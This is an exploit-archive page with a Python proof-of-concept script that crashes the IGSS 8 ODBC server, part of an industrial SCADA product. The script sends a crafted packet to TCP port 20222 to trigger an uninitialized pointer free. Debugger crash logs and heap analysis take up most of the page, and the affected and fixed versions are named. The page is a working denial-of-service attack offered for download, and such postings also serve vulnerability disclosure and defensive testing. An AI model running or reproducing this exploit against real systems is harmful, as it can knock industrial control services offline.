exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IGSS 8 ODBC Server Denial Of Service

IGSS 8 ODBC Server Denial Of Service
Posted Mar 23, 2011
Authored by Jeremy Brown

There are multiple remote uninitialized pointer free conditions in IGSS's ODBC server. By sending a specially crafted packet to listening port 20222, it is possible to crash the server. Execution of arbitrary code is unlikely.

tags | exploit, remote, denial of service, arbitrary
SHA-256 | d82e97b8f0e340895167edfec6e1532847830e7ddab52ff2c288237ef372149f

IGSS 8 ODBC Server Denial Of Service

Change Mirror Download
#!/usr/bin/python
# igss.py
# IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# There are multiple remote uninitialized pointer free conditions in IGSS's ODBC
# server. By sending a specially crafted packet to listening port 20222, it is
# possible to crash the server. Execution of arbitrary code is unlikely.
#
# Note: IGSS uses a 3rd party ODBC driver kit from Dr. DeeBee.
#
# HEAP[Odbcixv8se.exe]: Invalid allocation size - 8899AABB (exceeded 7ffdefff)
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:002> g
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:002> g
# Heap corruption detected at 00175008
# Heap corruption detected at 00177F78
# Heap corruption detected at 001733D8
# (f10.cf8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00173398 ebx=00000000 ecx=feeefeee edx=001733d8 esi=00173390 edi=00150000
# eip=7c9276fc esp=0102fc34 ebp=0102fd08 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# ntdll!RtlFreeHeapSlowly+0x392:
# 7c9276fc 8901 mov dword ptr [ecx],eax ds:0023:feeefeee=????????
# 0:002> kb
# ChildEBP RetAddr Args to Child
# 0102fd08 7c96f85a 00150000 50000061 00173398 ntdll!RtlFreeHeapSlowly+0x392
# 0102fd7c 7c94bc4c 00150000 50000061 00173398 ntdll!RtlDebugFreeHeap+0x193
# 0102fe64 7c927573 00150000 40000061 00173398 ntdll!RtlFreeHeapSlowly+0x37
# 0102ff34 7c80fd4f 00150000 00000001 00173398 ntdll!RtlFreeHeap+0xf9
# *** ERROR: Module load completed but symbols could not be loaded for Odbcixv8se.exe
# 0102ff7c 0044531d 00aa001c 0102ffb4 00443abd kernel32!GlobalFree+0xb5
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 0102ff88 00443abd 00173398 00000014 00000016 Odbcixv8se+0x4531d
# 0102ffb4 7c80b729 00000710 00000000 00000000 Odbcixv8se+0x43abd
# 0102ffec 00000000 004436f0 00000710 00000000 kernel32!BaseThreadStart+0x37
#
# feeefeee = freed memory
#
# RtlFreeHeap() takes three arguments:
# HeapHandle --> 0x173398
# Flags --> 0x00000001
# HeapBase --> 0x173398
#
# HeapBase is the pointer to the memory block that is going to be freed.
#
# 0:002> dd 173398
# 00173398 001733d8 -----------------------------
# 001733a8 feeefeee feeefeee feeefeee feeefeee -
# 001733b8 feeefeee feeefeee feeefeee feeefeee -
# 001733c8 feeefeee feeefeee feeefeee feeefeee -
# 001733d8 feeefeee feeefeee feeefeee feeefeee <-
# 001733e8 feeefeee feeefeee feeefeee feeefeee
# 001733f8 feeefeee feeefeee feeefeee feeefeee
# 00173408 feeefeee feeefeee feeefeee feeefeee
#
# In this example, the pointer to free happens to point to free memory.
#
# Tested IGSS 8 (Odbcixv8se.exe version 10299) on Windows
#
# Fixed version: IGSS 8 (Odbcixv8se.exe version 11003)
# http://www.syware.com/download/drdeebee/gold_bug.txt
#

import sys
import socket

req_1=(
"\x00\x00\x00\x34"
"\x02\x00\x00\x00\x02\x00\x00\x00\x02\x2e\x00\x00\x00\x00\x19\x49"
"\x47\x53\x53\x33\x32\x76\x38\x20\x4f\x44\x42\x43\x20\x4e\x65\x74"
"\x77\x6f\x72\x6b\x20\x44\x53\x00\x00\x00\x00\x02\x20\x00\x00\x00"
"\x00\x02\x20\x00"
)

req_2=(
"\x00\x00\x00\xff"+ # length
"\x16"+ # switch code
"\x77" * 254+ # begin query here
"\x88\x99\xaa\xbb" # test
)

if len(sys.argv)!=2:
print "Usage: %s <target>" % sys.argv[0]
sys.exit(0)

target=sys.argv[1]
port=20222
cs=target,port

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.settimeout(1)

sock.send(req_1)

try:
resp=sock.recv(1024)
print "resp_1 = %s\n"%resp.encode("hex")
except: pass

sock.send(req_2)

try:
resp=sock.recv(1024)
print "resp_2 = %s\n"%resp.encode("hex")
except: pass

sock.close()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close